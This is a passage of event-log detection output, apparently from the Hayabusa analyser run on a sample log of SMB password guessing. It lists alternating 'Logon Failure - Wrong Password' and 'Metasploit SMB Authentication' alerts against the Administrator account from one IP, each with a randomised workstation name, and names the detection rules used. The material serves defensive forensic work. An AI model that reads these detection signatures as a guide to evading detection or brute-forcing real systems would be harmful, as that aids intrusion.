12542016-09-20 01:50:10.383 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: rGpD7AJUTekDmd6Q : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12552016-09-20 01:50:10.383 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12562016-09-20 01:50:10.423 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: OykzTOn7B9THv0cT : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12572016-09-20 01:50:10.423 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12582016-09-20 01:50:10.462 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: cIYOrBBwX8nFpCzw : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12592016-09-20 01:50:10.462 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12602016-09-20 01:50:10.508 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: SvnROHLMVnmPfAyy : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12612016-09-20 01:50:10.508 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12622016-09-20 01:50:10.547 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 5EwJ84H7kXQXzGZz : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12632016-09-20 01:50:10.547 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12642016-09-20 01:50:10.580 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 34RLeLWDgLayU3JM : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12652016-09-20 01:50:10.580 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12662016-09-20 01:50:10.619 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: QaXHGUgboODAi5Qu : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12672016-09-20 01:50:10.619 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12682016-09-20 01:50:10.659 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: QlOlZ0m397CsmaeD : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12692016-09-20 01:50:10.659 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12702016-09-20 01:50:10.699 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: N24rSPCI8DsQIPXR : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12712016-09-20 01:50:10.699 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12722016-09-20 01:50:10.738 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 5y2tgoUcs6mFPZm4 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12732016-09-20 01:50:10.738 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12742016-09-20 01:50:10.776 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: HmFX6MioYqaMumgw : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12752016-09-20 01:50:10.776 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12762016-09-20 01:50:10.820 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: R4HRWlPWPKy1Cicq : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12772016-09-20 01:50:10.820 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12782016-09-20 01:50:10.869 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: GDUf7wVbHkS9uaPC : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12792016-09-20 01:50:10.869 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12802016-09-20 01:50:10.917 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: eBX0Lviz6Bv5rGcb : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12812016-09-20 01:50:10.917 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12822016-09-20 01:50:10.956 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: zZwPm9qahLU78FRY : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12832016-09-20 01:50:10.956 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12842016-09-20 01:50:11.008 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: jOVsopykTHNQcYUp : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12852016-09-20 01:50:11.008 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12862016-09-20 01:50:11.060 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: n8DY7sdDY8nuWdME : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12872016-09-20 01:50:11.060 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12882016-09-20 01:50:11.105 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: rTxEVu7mudXEBARZ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12892016-09-20 01:50:11.105 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12902016-09-20 01:50:11.148 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 7ohqvCoOLkFRcqvE : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12912016-09-20 01:50:11.148 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12922016-09-20 01:50:11.180 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: me8rikVJqcKxvHdq : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12932016-09-20 01:50:11.180 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12942016-09-20 01:50:11.228 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: oLqVmqCmHTrD7V8V : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12952016-09-20 01:50:11.228 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12962016-09-20 01:50:11.269 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 5ySdyzxvDasHgjq0 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12972016-09-20 01:50:11.269 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12982016-09-20 01:50:11.312 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: N2auwOc1wemq76n1 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12992016-09-20 01:50:11.312 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13002016-09-20 01:50:11.348 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: RgK6lHgC5WOBk4kW : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13012016-09-20 01:50:11.348 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13022016-09-20 01:50:11.389 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 2GG0bKgusKqseQij : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13032016-09-20 01:50:11.389 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13042016-09-20 01:50:11.432 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: MpHm7DcOmhq4rkaX : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13052016-09-20 01:50:11.432 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13062016-09-20 01:50:11.468 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: OX1vVGrE7fJSMEiZ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13072016-09-20 01:50:11.468 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13082016-09-20 01:50:11.508 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 65i7wtyAhL58QrzC : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13092016-09-20 01:50:11.508 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13102016-09-20 01:50:11.551 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: k8uSVFRTLTB6g1eg : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13112016-09-20 01:50:11.551 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13122016-09-20 01:50:11.592 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ire6VOUMWZQnNjES : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13132016-09-20 01:50:11.592 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13142016-09-20 01:50:11.629 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: pGWnvKUXnbJvRqql : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13152016-09-20 01:50:11.629 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13162016-09-20 01:50:11.666 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: xBVvrrLf1rnAviKS : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13172016-09-20 01:50:11.666 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13182016-09-20 01:50:11.704 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: NE9atGNBlSLQLLcX : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13192016-09-20 01:50:11.704 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13202016-09-20 01:50:11.744 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: a0M5EaAXziu07hOH : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13212016-09-20 01:50:11.744 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13222016-09-20 01:50:11.784 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: PM1mwxqI7yVgoK2D : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13232016-09-20 01:50:11.784 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13242016-09-20 01:50:11.836 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: MPqnpvetHXdThxYg : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13252016-09-20 01:50:11.836 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13262016-09-20 01:50:11.879 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: gthbVQMJ7UD2QS7H : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13272016-09-20 01:50:11.879 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13282016-09-20 01:50:11.920 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: AwwJXCoC3gMDoDn7 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13292016-09-20 01:50:11.920 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13302016-09-20 01:50:12.068 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ilNNoVbZpyhtsNkV : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13312016-09-20 01:50:12.068 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13322016-09-20 01:50:12.109 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: eNY0lv9IglfHP34d : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13332016-09-20 01:50:12.109 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13342016-09-20 01:50:12.167 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: BjSeQciwy17L7raV : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13352016-09-20 01:50:12.167 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13362016-09-20 01:50:12.208 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: wycE1fIsmPq9zaMU : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13372016-09-20 01:50:12.208 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13382016-09-20 01:50:12.241 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 5z1spxImm2ZlGOld : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13392016-09-20 01:50:12.241 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13402016-09-20 01:50:12.294 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Dg7o4GCET1bJrlEU : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13412016-09-20 01:50:12.294 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13422016-09-20 01:50:12.376 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: E7Db3OLA0XPXL1B4 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13432016-09-20 01:50:12.376 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13442016-09-20 01:50:12.417 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Uoqx5iPRp2tfYYos : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13452016-09-20 01:50:12.417 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13462016-09-20 01:50:12.448 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Ixw5XWC2frtrTUkv : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13472016-09-20 01:50:12.448 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13482016-09-20 01:50:12.495 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 3v0NpzAp7io9gbZQ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13492016-09-20 01:50:12.495 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
